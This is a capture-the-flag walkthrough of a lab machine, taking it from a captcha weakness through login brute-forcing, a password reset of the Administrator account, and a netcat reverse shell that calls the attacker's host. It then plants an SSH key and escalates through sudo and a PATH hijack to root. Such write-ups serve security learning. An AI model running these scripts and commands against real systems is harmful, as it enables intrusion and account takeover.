image-20250528202444683

Reconnaissance

image-20250528210323627

Port 80 serves the Apache default page.

In the page source we find the path

/var/www/html/finexo

Browsing to finexo

there is a login form.

image-20250528210635599

The first username tried exists (the login page confirms it).

In the source of the login page there is a JS file.

image-20250528210751072

image-20250528210800494

Clearly JSFuck.

Decoding it yields:

```php
function generateCaptcha() {
    $characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    $code = "";
    $seed = time();      // seed is the current Unix timestamp: predictable by anyone
    mt_srand($seed);
    for ($i = 0; $i < 4; $i++) {
        $code .= $characters[mt_rand(0, strlen($characters) - 1)];
    }
    $_SESSION['captcha'] = strtolower($code);   // stored lowercase, so the check is case-insensitive
    return $code;
}
```

This is the captcha generation logic.

mt_rand is seeded with the current Unix timestamp (time()) and four characters are drawn from a 62-character alphabet. The seed is nothing but the server's clock, so anyone who knows the second in which the captcha was issued can reproduce it: the nominal 62^4 (about 14.8 million) possible codes collapse to a handful of candidate seeds around the attacker's own clock.
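As an added illustration (not code from the box or from this writeup), here is the same design flaw reproduced in Python: a captcha seeded with the wall-clock second, next to the attacker-side routine that recovers it from a small window of candidate seeds. Python's `random` seeds its Mersenne Twister differently from PHP's `mt_srand`, so this is not a bit-exact predictor for the target's PHP; it shows why the keyspace collapses when the seed is the time. The alphabet and length are copied from the decoded PHP; the ±2 second window is an assumption.

```python
import random
import string
import time

# Same 62-character alphabet and 4-character length as the PHP generateCaptcha() above.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits
CAPTCHA_LEN = 4


def generate_captcha(seed: int) -> str:
    """Server side: seed a PRNG with a Unix timestamp and draw 4 characters.

    Mirrors mt_srand(time()) + mt_rand(0, strlen-1) from the page, but with
    Python's Mersenne Twister seeding (different generator, same flaw).
    """
    rng = random.Random(seed)
    return "".join(ALPHABET[rng.randrange(len(ALPHABET))] for _ in range(CAPTCHA_LEN))


def candidate_captchas(now: int, skew: int = 2) -> dict:
    """Attacker side: every captcha the server could have issued within +/- skew
    seconds of `now`, keyed by the seed that produces it. The server stores
    strtolower($code), so candidates are lowercased for comparison."""
    return {now + d: generate_captcha(now + d).lower() for d in range(-skew, skew + 1)}


def recover_seed(observed: str, now: int, skew: int = 2):
    """Return the timestamp that produced `observed`, or None if it is outside the window."""
    for seed, code in candidate_captchas(now, skew).items():
        if code == observed.lower():
            return seed
    return None


def keyspace_reduction(skew: int = 2) -> tuple:
    """(naive keyspace of 4-char codes, candidates actually worth trying)."""
    return len(ALPHABET) ** CAPTCHA_LEN, 2 * skew + 1


if __name__ == "__main__":
    # Simulation: the server issues a captcha at second T; the attacker looks at
    # its own clock one second later and enumerates the seed window.
    t_server = int(time.time())
    issued = generate_captcha(t_server)
    print("server issued:", issued)
    print("attacker candidates:", candidate_captchas(t_server + 1))
    print("recovered seed matches:", recover_seed(issued, t_server + 1) == t_server)
    print("keyspace %d -> %d candidates" % keyspace_reduction())
```

The fix on the server side is the same in any language: derive the captcha from a CSPRNG (`random_int()` in PHP) rather than a time-seeded `mt_rand`, and never expose the generated text through an endpoint.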

image-20250528213457184

Visiting http://ip/finexo/login.php?action=generateCaptcha

returns the captcha text directly, so there is no need to predict the seed at all: the brute-force script simply fetches a fresh captcha in the same session before each login attempt.

```python
import requests  # HTTP client for the captcha and login requests

# Target URLs (adjust the IP to the actual target)
captcha_url = 'http://192.168.56.132/finexo/login.php?action=generateCaptcha'  # returns the captcha text
login_url = 'http://192.168.56.132/finexo/login.php'  # login form handler
wordlist = 'rockyou.txt'  # swap in the themed SpongeBob list below

# One Session keeps the PHPSESSID cookie, so the captcha we fetch is the one
# stored in $_SESSION['captcha'] for our own login attempt.
session = requests.Session()

cnt = 0  # attempt counter

with open(wordlist, 'r', encoding='utf-8', errors='ignore') as f:
    for line in f:
        password = line.strip()  # drop the trailing newline
        if not password:
            continue

        # Step 1: fetch a fresh captcha. This abuses the endpoint returning the
        # captcha text to the client. The server stores strtolower($code), so
        # lowercase it before sending.
        try:
            captcha = session.get(captcha_url, timeout=10).text.strip().lower()
        except requests.exceptions.RequestException as e:
            print(f"  [error] captcha request failed: {e}, skipping password: {password}")
            continue
        if not captcha:
            print(f"  [warn] empty captcha, skipping password: {password}")
            continue

        # Step 2: submit the login with the captcha bound to this session
        data = {
            'username': 'spongebob',   # username confirmed to exist
            'password': password,      # current wordlist entry
            'captcha': captcha,        # captcha fetched a moment ago
        }
        try:
            resp = session.post(login_url, data=data, timeout=10)
        except requests.exceptions.RequestException as e:
            print(f"  [error] login request failed: {e}, skipping password: {password}")
            continue
        cnt += 1
        print(f"trying password: {password} (attempt {cnt})")

        # Step 3: the success page contains the word "successful"
        if "successful" in resp.text:
            print("\n--- success ---")
            print(f"login successful, password found: {password}")
            break
```

Since SpongeBob references are everywhere on this box, generate a themed wordlist and brute-force with that:

```text
spongebob
Spongebob
SPONGEBOB
spongebob1
spongebob123
spongebob@
spongebob!
spongebob_squarepants
SpongeBobSquarePants
squarepants
Squarepants
patrick
Patrick
PATRICK
patrick123
star
Star
squidward
Squidward
SQUIDWARD
tentacles
mrkrabs
Mrkrabs
MrKrabs
krabs
Krabs
pearl
Pearl
sandy
Sandy
chipmunk
plankton
Plankton
chum
bucket
ChumBucket
gary
Gary
meow
pineapple
Pineapple
bikini
bottom
BikiniBottom
krabbypatty
KrabbyPatty
formula
secretformula
jellyfish
Jellyfish
net
bubble
Bubble
blower
clarinet
Clarinet
gloveworld
GloveWorld
rockbottom
RockBottom
goofygoober
GoofyGoober
jellyfishing
Jellyfishing
chumbucket
kelprea
thekrustykrab
KrustyKrab
finexo
Finexo
finexo123
finexo@
finexo!
```

image-20250528214610227

This yields the credentials SpongeBob / squarepants.

image-20250528221624985

An image webshell can be uploaded,

and intercepting the profile request shows the identity fields can be tampered with,

but neither is directly exploitable.

image-20250529134904893

Changing the role to Administrator directly fails, but the same tampered request still lets us change the Administrator's password.

image-20250529135541104

Logged in successfully as Administrator.

image-20250529135654682

Being admin is nice: commands can be executed directly from the admin panel.

```sh
# on the attacker box first: nc -lvnp 8888
# then run on the target through the admin panel:
nc 192.168.56.103 8888 -e /bin/sh
```

The listener receives a shell.

```text
www-data@KrustyKrab:/home$ sudo -l
Matching Defaults entries for www-data on KrustyKrab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on KrustyKrab:
    (KrustyKrab) NOPASSWD: /usr/bin/split
```

`split --filter=COMMAND` hands every output chunk to a shell running COMMAND, so pointing the filter at /bin/sh gives a shell as KrustyKrab (the standard GTFOBins split trick):

```sh
www-data@KrustyKrab:/home$ sudo -u KrustyKrab split --filter=/bin/sh /dev/stdin
whoami
KrustyKrab
```

The user flag is in KrustyKrab's home directory.

For persistence, drop an SSH key so we can log in directly:

```sh
# as KrustyKrab on the target: install the attacker's public key
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0lTDrkYOmPAyKqDSdWVZuDsOnMhScsUK765Po98D9HXbhTKDUbBQ6QhcfTOfiKI/rTK8sgKyulNd6Uyf/MBV7YT6qOtzP7fQ054PFZQViXQNwtcsFmyFLHlnpZzsfoC1eW3EX1/6pyNWfNr+SZrbWJOnaqTzq5ajT9Yob/BSMjrFFnckfqlfFSryTVTFtT64wlyo2x7o6aE9Fvc7b/tWqBZT/H2EqRFZ/4mwz69jrXO6xwhxbNDpPclwhSCR1POMy5HYMPB1cV2vCG+ecwqYR1tbpb5FsksJlKKZe4PPueYBTR1LkIrm12kLLiTzcdcXnVsBtiTrtv/NEi0VwMeD9UWwaUW2k31sE2cehVHeVlas1vQg/t51/kVfTptlrvPWxjSClzxh+Nxtb9AlE87f+9Km2CgwdG9q4UZ4T6sc0xTbtva/N+FEPKuq9kV9Hn7LrLFG9XlkttLh4NggFRW0ddRT3HlJkpJ52LkxaB4+OjoomPp4/LcS7RUkKnn1gEns= root@kali" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys   # sshd refuses keys from a world-readable authorized_keys
```

Then log in from Kali with the matching private key:

```text
┌──(root㉿kali)-[/myift/krus]
└─# ssh KrustyKrab@192.168.56.132 -i id_rsa
The authenticity of host '192.168.56.132 (192.168.56.132)' can't be established.
ED25519 key fingerprint is SHA256:0d4MWSfQ+tUZ0f4j8Wea2uYelBzzcaj0CI4NtYQIx0E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.132' (ED25519) to the list of known hosts.
Linux KrustyKrab 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 00:15:24 2025 from 192.168.56.118
KrustyKrab@KrustyKrab:~$
```

KrustyKrab's home directory also contains a file named help, which turns out to be an image:

```text
┌──(root㉿kali)-[/myift/krus]
└─# file help
help: GIF image data, version 89a, 480 x 270
```

Back on the target, sudo -l for KrustyKrab:

```text
KrustyKrab@KrustyKrab:~$ sudo -l
Matching Defaults entries for KrustyKrab on KrustyKrab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User KrustyKrab may run the following commands on KrustyKrab:
    (spongebob) NOPASSWD: /usr/bin/ttteeesssttt
```

image-20250529153951742

Run /usr/bin/ttteeesssttt as spongebob:

```text
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt

Spongebob forgot how to make Krabby Patty, You need to help him!

Current shuffled recipe order:
A: Pickles
B: Ketchup
C: Lettuce
D: Patty
E: Onion
F: Top bun
G: Mustard
H: Cheese
I: Tomato
J: Bottom bun

Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J):
```

The correct assembly order is shown in the animated help GIF (frames below). Note the letters are reshuffled on every run, so the answer has to be re-derived from the current menu each time.

image-20250529154515733

image-20250529154523604

image-20250529154534468

```text
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt

Spongebob forgot how to make Krabby Patty, You need to help him!

Current shuffled recipe order:
A: Tomato
B: Onion
C: Lettuce
D: Ketchup
E: Pickles
F: Top bun
G: Patty
H: Cheese
I: Bottom bun
J: Mustard

Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J): IGCHBADJEF

Validation successful! Perfect Krabby Patty!
spongebob@KrustyKrab:/home/KrustyKrab$
```

That drops us straight into a shell as the spongebob user.
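Because the letters are reshuffled on every run, it is worth having a small solver rather than re-deriving the answer by hand. The following is an added example, not code from the writeup or from the box: it parses the "X: Ingredient" lines of the prompt and emits the letter string. The bottom-to-top recipe is reconstructed from the help GIF and the accepted answer IGCHBADJEF above; the two sample prompts are copied from the runs shown on this page.

```python
import re

# Krabby Patty assembly order, bottom to top, reconstructed from the help GIF
# and confirmed by the accepted answer IGCHBADJEF on the page.
RECIPE = [
    "Bottom bun", "Patty", "Lettuce", "Cheese", "Onion",
    "Tomato", "Ketchup", "Mustard", "Pickles", "Top bun",
]

# Sample prompts copied from the two runs on the page (the first was not answered).
PROMPT_RUN1 = """Current shuffled recipe order:
A: Pickles
B: Ketchup
C: Lettuce
D: Patty
E: Onion
F: Top bun
G: Mustard
H: Cheese
I: Tomato
J: Bottom bun

Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J):"""

PROMPT_RUN2 = """Current shuffled recipe order:
A: Tomato
B: Onion
C: Lettuce
D: Ketchup
E: Pickles
F: Top bun
G: Patty
H: Cheese
I: Bottom bun
J: Mustard

Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J):"""


def parse_menu(prompt: str) -> dict:
    """Map ingredient name -> letter from lines of the form 'A: Pickles'."""
    menu = {}
    for m in re.finditer(r"^\s*([A-J]):\s*(\S.*?)\s*$", prompt, re.MULTILINE):
        menu[m.group(2)] = m.group(1)
    return menu


def solve(prompt: str) -> str:
    """Return the 10-letter answer for the current shuffle, or raise if the
    prompt does not contain exactly the ingredients we know about."""
    menu = parse_menu(prompt)
    missing = [name for name in RECIPE if name not in menu]
    if missing:
        raise ValueError(f"prompt is missing ingredients: {missing}")
    if len(menu) != len(RECIPE):
        raise ValueError(f"unexpected ingredient count: {len(menu)}")
    return "".join(menu[name] for name in RECIPE)


if __name__ == "__main__":
    print("run 1:", solve(PROMPT_RUN1))
    print("run 2:", solve(PROMPT_RUN2))
```

Usage: start the binary, paste the prompt into `solve()`, and type the returned letters at the "Enter 10 letters" prompt.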

```text
spongebob@KrustyKrab:/home/KrustyKrab$ cd
spongebob@KrustyKrab:~$ ls
key1  key2.jpeg  note.txt
spongebob@KrustyKrab:~$ file key1
key1: ASCII text
spongebob@KrustyKrab:~$ cat key1
e1964798cfe86e914af895f8d0291812
spongebob@KrustyKrab:~$ cat note.txt

Squidward is waiting for you!!!!

password is md5($key1$key2).

It's not so hard as you think.

You have new mail in /var/mail/spongebob
spongebob@KrustyKrab:~$
```

image-20250529155642899

(Squidward looks so cool.)

I assumed key2 was hidden inside the image, but that was overthinking it:

key2 is simply the md5 of the image file.

```text
┌──(root㉿kali)-[/myift/krus]
└─# md5sum key2.jpeg
5e1d0c1a168dc2d70004c2b00ba314ae  key2.jpeg
```

Then compute md5($key1$key2), i.e. the md5 of the two hex digests concatenated (note `echo -n`: a trailing newline would change the hash):

```text
┌──(root㉿kali)-[/myift/krus]
└─# echo -n "e1964798cfe86e914af895f8d02918125e1d0c1a168dc2d70004c2b00ba314ae" | md5sum
7ac254848d6e4556b73398dde2e4ef82  -
```

```text
spongebob@KrustyKrab:/home$ su Squidward
Password:
$ whoami
Squidward
```

The su succeeds with that hash as Squidward's password.
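Notes like "password is md5($key1$key2)" are ambiguous when one of the keys is a file, and it is cheaper to compute every plausible reading at once than to try them one by one with `su`. The following is an added example (not code from the writeup): it takes key1 as read from the file and the raw bytes of key2.jpeg and returns the candidates. The "hex+hex" reading is the one that worked on this box; the other two are assumptions about what a different challenge author might have meant.

```python
import hashlib


def md5_hex(data: bytes) -> str:
    """Hex MD5 of a byte string, the same value `md5sum` prints."""
    return hashlib.md5(data).hexdigest()


def candidate_passwords(key1: str, key2_file: bytes) -> dict:
    """Plausible readings of 'md5($key1$key2)' when key2 is a file.

    hex+hex          md5(key1 . md5(key2.jpeg))   <- the reading that worked on the box
    hex+raw          md5(key1 . <raw file bytes>)  (assumption: alternative reading)
    hex+newline+hex  like hex+hex but keeping the newline `cat key1` prints (assumption)
    """
    key1_clean = key1.strip()          # the newline after `cat key1` is not part of the key
    key2_hex = md5_hex(key2_file)
    return {
        "hex+hex": md5_hex((key1_clean + key2_hex).encode()),
        "hex+raw": md5_hex(key1_clean.encode() + key2_file),
        "hex+newline+hex": md5_hex((key1_clean + "\n" + key2_hex).encode()),
    }


if __name__ == "__main__":
    import sys
    # usage: python3 keys.py key1 key2.jpeg
    with open(sys.argv[1]) as f:
        k1 = f.read()
    with open(sys.argv[2], "rb") as f:
        k2 = f.read()
    for label, pw in candidate_passwords(k1, k2).items():
        print(f"{label:16} {pw}")
```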

```text
$ find / -perm -u=s -type f 2>/dev/null
/home/Squidward/laststep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/sbin/exim4
```

Among the setuid binaries, the non-standard one is laststep in Squidward's home directory:

```text
$ file laststep
laststep: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b84dc5079c77a9f2f2d82492f95a9c110ec51c87, for GNU/Linux 3.2.0, not stripped
$ strings laststep
/lib64/ld-linux-x86-64.so.2
setgid
setuid
system
__libc_start_main
__cxa_finalize
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
cat /etc/shadow
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
system@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
setgid@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
```

The strings show what the binary does: it imports setuid, setgid and system, and the only command string is

cat /etc/shadow

so it calls system("cat /etc/shadow") after raising privileges. Because cat is invoked by bare name rather than by absolute path, and the binary does not sanitize PATH, the lookup can be hijacked: put a directory we control first in PATH with our own `cat` in it.

```sh
$ echo bash > cat        # our fake "cat" just starts a shell
$ ls
cat laststep
$ chmod 777 cat          # only the execute bit is needed; chmod +x cat is enough
$ PATH=.:$PATH           # current directory is searched before /usr/bin
$ ./laststep
root@KrustyKrab:~#
```

This yields a root shell without `bash -p` because laststep calls setuid()/setgid() itself before system(): the shell starts with a real uid of root rather than only an effective uid, so bash does not drop the privileges.